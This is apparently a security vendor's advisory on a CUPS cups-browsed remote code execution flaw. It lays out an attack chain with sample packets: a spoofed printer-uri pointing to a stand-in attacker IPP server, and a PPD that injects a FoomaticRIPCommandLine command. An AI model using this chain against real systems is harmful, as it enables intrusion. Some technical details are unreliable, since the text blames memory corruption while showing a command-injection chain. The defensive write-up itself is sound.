Remote Code Execution (RCE) in CUPS via ‘cups-browsed’

CUPS (Common Unix Printing System) is a popular printing system for Unix-like systems, with cups-browsed responsible for printer discovery and network browsing. A recent vulnerability in cups-browsed allows Remote Code Execution (RCE) through manipulated printer discovery responses. This vulnerability is caused by insufficient input validation on UDP port 631, which is used for printer discovery.

CUPS Vulnerability Details

In its default configuration, cups-browsed listens on all interfaces (0.0.0.0:631), allowing both LAN and WAN-based attackers to send malicious UDP packets. These packets trigger the processing of printer discovery data in an unsafe manner. The flaw is in the handling of these discovery packets, where improper parsing leads to memory corruption, potentially allowing attackers to execute arbitrary code.

The vulnerability arises when cups-browsed processes a specially crafted packet in the following format:

HEX_NUMBER HEX_NUMBER TEXT_DATA

Copied

Insufficient checks allow attackers to exploit this behavior, which could result in arbitrary code execution. The vulnerable function, process_browse_data, fails to validate input adequately, leading to a possible race condition or memory corruption.

Affected CUPS Versions

  • CUPS versions prior to 2.3.3: These versions are vulnerable to the RCE issue due to the lack of input validation and unsafe memory handling in cups-browsed.
  • Versions 2.3.3 and later: A patch was introduced to improve input validation and memory handling, reducing the risk of arbitrary code execution.

Exploitation Scenarios 

1. Discovery of IPP Server:

The attacker initiates the attack by scanning the network for devices running the Common Unix Printing System (CUPS) that support IPP (Internet Printing Protocol). They send multicast or broadcast packets to discover active printers, often using tools like Nmap or ippfind.

Example of a discovery packet (typically sent over UDP):

IPP/1.1 Get-Printer-Attributes
Request-ID: 1

Copied

2. Crafting Malicious Response:

Once a potential target is identified, the attacker crafts a malicious response packet designed to hijack the print discovery process. This response mimics a legitimate printer response but contains a redirect to the attacker’s IPP server.

The attacker sets the printer-uri to point to their malicious IPP server:

IPP/1.1 200 OK
Request-ID: 1
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER

Copied

3. Connection to Malicious IPP Server:

The victim’s system, upon receiving the malicious response, attempts to connect to the attacker’s IPP server. It sends a request to fetch printer attributes or capabilities:

IPP/1.1 Get-Printer-Attributes
Request-ID: 2
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER

Copied

4. Delivering Malicious PPD File:

The attacker’s IPP server responds with a crafted PPD file containing malicious commands:

IPP/1.1 200 OK
Request-ID: 2
attributes-charset: utf-8
attributes-natural-language: en
printer-commands: Print
printer-name: EVIL_PRINTER
printer-uri: ipp://attacker-ip:631/EVIL_PRINTER
*FoomaticRIPCommandLine: "echo 1 > /tmp/PWNED"
*cupsFilter2: "application/pdf application/vnd.cups-postscript 0 foomatic-rip"

Copied

5. Execution of Malicious Commands:

When a print job is initiated on the compromised printer, the CUPS system processes the job using the foomatic-rip filter. This filter executes the command specified in the FoomaticRIPCommandLine, resulting in the execution of arbitrary code:

echo 1 > /tmp/PWNED

Copied

Mitigation and Patches

Upwind’s research team compiled detailed mitigation steps, which can be viewed in this article.

How Upwind Protects You from CUPS RCE Vulnerability

Upwind Cloud Security Platform provides comprehensive protection and vulnerability management, offering tools to identify and mitigate risks from this vulnerability:

  • SBOM Explorer: Use Upwind’s SBOM Explorer to locate all instances of CUPS and cups-browsed in your environment and check which versions are affected by this vulnerability.
  • Vulnerable Resource Detection: Identify all resources in your environment running vulnerable versions of CUPS, and assess which clusters, VMs, and resources are exposed to this vulnerability.
  • Risk Context: Understand the potential impact of this vulnerability on your system, particularly in environments with sensitive data, internet exposure, or communication with critical services.
  • Prioritize Fixes: Upwind helps you prioritize patching or updating vulnerable resources, streamlining the process to secure your environment against this RCE vulnerability.
  • Interactive Map and Connections: Upwind provides an interactive map to visualize all network connections. You can easily locate and monitor connections on UDP ports 631 and 5353, helping you identify potential vulnerabilities and secure your environment effectively.

Get Further Assistance with Upwind MDR

For real-time support, Upwind’s Managed Detection and Response (MDR) team is available 24/7 to assist with critical vulnerabilities like the CUPS RCE. Contact the MDR team at [email protected] for help with patching or mitigating this vulnerability in your environment.